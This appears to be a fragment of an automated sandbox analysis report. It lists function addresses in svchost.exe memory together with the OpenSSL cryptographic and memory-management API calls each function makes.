Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3670340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,42_2_00007FFDA3670340
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA363A330
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3634330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,42_2_00007FFDA3634330
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,42_2_00007FFDA361A330
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36622F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36622F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36882E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36882E7
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,42_2_00007FFDA366A2E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365A1D0 CRYPTO_realloc,42_2_00007FFDA365A1D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36541B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,42_2_00007FFDA36541B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3616190 CRYPTO_malloc,CRYPTO_free,42_2_00007FFDA3616190
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3686190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,42_2_00007FFDA3686190
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,42_2_00007FFDA366C190
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624160
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3658160 CRYPTO_memdup,42_2_00007FFDA3658160
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,42_2_00007FFDA361E220
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36421E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,42_2_00007FFDA36421E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36181E0 CRYPTO_get_ex_data,42_2_00007FFDA36181E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364C0D0 CRYPTO_free,42_2_00007FFDA364C0D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3670070 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,42_2_00007FFDA3670070
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624060 CRYPTO_free,CRYPTO_memdup,42_2_00007FFDA3624060
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3628140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3628140
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3610130 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3610130
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3650130 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3650130
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624120 CRYPTO_set_ex_data,42_2_00007FFDA3624120
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3648120 CRYPTO_free,42_2_00007FFDA3648120
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36340E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,42_2_00007FFDA36340E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36140E0 CRYPTO_get_ex_data,42_2_00007FFDA36140E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36567D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,42_2_00007FFDA36567D1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36507D0 CRYPTO_malloc,memcpy,CRYPTO_free,42_2_00007FFDA36507D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA364A7D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36627B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA36627B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365E790 CRYPTO_free,42_2_00007FFDA365E790
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3650770 CRYPTO_clear_free,CRYPTO_free,42_2_00007FFDA3650770
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA365A850
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3658850 CRYPTO_realloc,42_2_00007FFDA3658850
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624840
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3608812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,42_2_00007FFDA3608812
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364E810 CRYPTO_zalloc,42_2_00007FFDA364E810
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3654800 OPENSSL_LH_delete,CRYPTO_free,42_2_00007FFDA3654800
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,42_2_00007FFDA367C7E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36027F0 DeleteCriticalSection,CRYPTO_free,42_2_00007FFDA36027F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365E6D0 CRYPTO_malloc,42_2_00007FFDA365E6D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624660 CRYPTO_free,CRYPTO_malloc,memcpy,42_2_00007FFDA3624660
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA364E660
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA3652740
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365E730 CRYPTO_free,42_2_00007FFDA365E730
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3608720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3608720
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA360E700
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364C700 CRYPTO_malloc,memcmp,memcpy,memcpy,42_2_00007FFDA364C700
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA364A5C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36525B0 OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA36525B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36345A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,42_2_00007FFDA36345A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36125A0 CRYPTO_strdup,CRYPTO_free,42_2_00007FFDA36125A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368C5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA368C5A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3628580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3628580
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3672630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3672630
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652630 OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA3652630
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA361C610
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36124D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,42_2_00007FFDA36124D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624490
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3642470 CRYPTO_zalloc,42_2_00007FFDA3642470
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,42_2_00007FFDA3602460
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3684460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,42_2_00007FFDA3684460
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,42_2_00007FFDA363E510
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3682500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,42_2_00007FFDA3682500
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3636BB0 CRYPTO_malloc,42_2_00007FFDA3636BB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3652BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,42_2_00007FFDA3652BA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3678B90 CRYPTO_free,CRYPTO_memdup,42_2_00007FFDA3678B90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3668B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,42_2_00007FFDA3668B90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362CB80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,42_2_00007FFDA360AB80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364AB80 CRYPTO_free,42_2_00007FFDA364AB80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,42_2_00007FFDA360CB70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,42_2_00007FFDA364AC50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA361ABF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361AAD0 CRYPTO_set_ex_data,42_2_00007FFDA361AAD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3680AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3680AD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,42_2_00007FFDA360CAB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3616A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,42_2_00007FFDA3616A90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602A80 CRYPTO_free,CRYPTO_free,42_2_00007FFDA3602A80
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3614A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3614A72
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365AA70 CRYPTO_realloc,42_2_00007FFDA365AA70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3634A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,42_2_00007FFDA3634A60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3666A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,42_2_00007FFDA3666A60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3636B30 CRYPTO_free,CRYPTO_free,42_2_00007FFDA3636B30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3680B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA3680B30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,42_2_00007FFDA366CB30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3670B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,42_2_00007FFDA3670B20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365EB20 CRYPTO_free,42_2_00007FFDA365EB20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,42_2_00007FFDA361E9C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36749C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,42_2_00007FFDA36749C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,42_2_00007FFDA362C9A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,42_2_00007FFDA364E960
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3676A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3676A30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA3624A20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36149F0 CRYPTO_memdup,CRYPTO_free,42_2_00007FFDA36149F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36869E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,42_2_00007FFDA36869E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36468B0 CRYPTO_zalloc,CRYPTO_free,42_2_00007FFDA36468B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,42_2_00007FFDA362A8B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368A8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA368A8B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368C890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,42_2_00007FFDA368C890
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360E880 CRYPTO_THREAD_run_once,42_2_00007FFDA360E880
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3672880 CRYPTO_free,CRYPTO_free,CRYPTO_free,42_2_00007FFDA3672880
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602860 CRYPTO_zalloc,InitializeCriticalSection,42_2_00007FFDA3602860
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3602940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,42_2_00007FFDA3602940
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365A940 CRYPTO_zalloc,42_2_00007FFDA365A940
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3672930 CRYPTO_realloc,42_2_00007FFDA3672930
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,42_2_00007FFDA364A910
